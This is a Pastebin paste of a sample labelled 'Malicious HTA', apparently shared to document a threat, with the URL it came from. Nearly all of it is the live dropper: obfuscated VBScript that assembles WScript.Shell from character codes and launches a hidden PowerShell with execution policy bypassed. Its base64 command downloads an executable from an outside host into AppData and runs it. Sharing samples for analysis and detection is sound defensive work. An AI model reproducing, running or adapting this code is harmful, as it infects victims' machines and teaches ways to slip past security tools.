Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Malicious HTA
- # URL: http://dhm-mhn.com/floyd/htazeco0.hta
- <!DOCTYPE html>
- <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
- <html>
- <body>
- <SCripT TypE="TExT/vBsCRiPt">
- DIM TClwPHywcEVC : dIm wYyXnfBOfSFL : SET TClwPHywcEVC = CREaTEoBJect ( Chr(&H57) & ChrW(&H53) & ChrW(&H63) & ChrW(&H52) & ChrW(&H49) & StrReverse(Chr(&H50)) & StrReverse(Chr(&H54)) & ChrW(&H2E) & Chr(&H53) & Chr(&H68) & StrReverse(Chr(&H45)) & Chr(&H4C) & Chr(&H4C) ) : wYyXnfBOfSFL = " poWERsheLl.EXe -eX bYpaSs -NoP -w HIDDeN -ec CQALACAAcwBFAFQALQBjAE8AbgB0AGUAbgBUAAkAIAAgAC0AdgBBAAkACwAJACgACQAgACAAbgBFAHcALQBvAGIAagBlAEMAdAAgAAwACQBTAHkAcwB0AGUATQAuAE4ARQB0AC4AVwBFAGIAYwBsAEkAZQBuAFQAIAALAAkAKQAuAEQATwB3AE4AbABPAEEARABEAEEAVABhACgACQAgAAkAHSAgAGgAdAB0AHAAOgAvAC8AZABoAG0ALQBtAGgAbgAuAGMAbwBtAC8AZgBsAG8AeQBkAC8AegBlAGMAbwAwAC4AZQB4AGUAIAAdIAkADAAJACkAIAAgAAkALQBFAE4ACQAMAAkAQgBZAFQAZQAgACAACQAtAHAAYQB0AEgAIAAMACAAHSAkAGUATgB2ADoAQQBwAHAAZABBAFQAQQBcAG8AbAB1AHcAYQB0AGEALgBlAHgAZQAdICAAIAAgADsACQALACAAUwB0AEEAcgB0ACAADAAJAB0gJABFAG4AdgA6AGEAUABQAGQAQQBUAEEAXABvAGwAdQB3AGEAdABhAC4AZQB4AGUAHSA= " : TClwPHywcEVC.ruN CHR ( 34 ) & TClwPHywcEVC.ExpaNdenVIROnmEntstRingS( Chr(&H25) & Chr(&H73) & StrReverse(Chr(&H79)) & StrReverse(Chr(&H53)) & StrReverse(ChrW(&H74)) & ChrW(&H45) & StrReverse(Chr(&H6D)) & StrReverse(Chr(&H72)) & StrReverse(ChrW(&H4F)) & StrReverse(ChrW(&H4F)) & ChrW(&H54) & StrReverse(Chr(&H25)) ) & Chr(&H5C) & ChrW(&H73) & ChrW(&H79) & StrReverse(Chr(&H53)) & Chr(&H74) & ChrW(&H65) & ChrW(&H6D) & Chr(&H33) & StrReverse(ChrW(&H32)) & Chr(&H5C) & StrReverse(Chr(&H77)) & ChrW(&H49) & StrReverse(Chr(&H4E)) & StrReverse(Chr(&H44)) & StrReverse(Chr(&H4F)) & Chr(&H57) & ChrW(&H73) & StrReverse(ChrW(&H50)) & StrReverse(ChrW(&H6F)) & ChrW(&H57) & ChrW(&H45) & StrReverse(ChrW(&H72)) & StrReverse(ChrW(&H53)) & ChrW(&H68) & StrReverse(ChrW(&H65)) & Chr(&H4C) & Chr(&H4C) & StrReverse(ChrW(&H5C)) & StrReverse(Chr(&H76)) & ChrW(&H31) & ChrW(&H2E) & StrReverse(Chr(&H30)) & StrReverse(Chr(&H5C)) & StrReverse(ChrW(&H70)) & ChrW(&H4F) & ChrW(&H57) & StrReverse(ChrW(&H45)) & Chr(&H72) & Chr(&H73) & ChrW(&H68) & Chr(&H45) & StrReverse(Chr(&H4C)) & Chr(&H6C) & Chr(&H2E) & Chr(&H65) & Chr(&H78) & Chr(&H65) & CHr ( 34 ) & Chr ( 32 ) & ChR ( 34 ) & wYyXnfBOfSFL & ChR ( 34 ) , 0 : SeT TClwPHywcEVC = notHing
- self.CLoSe
- </script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement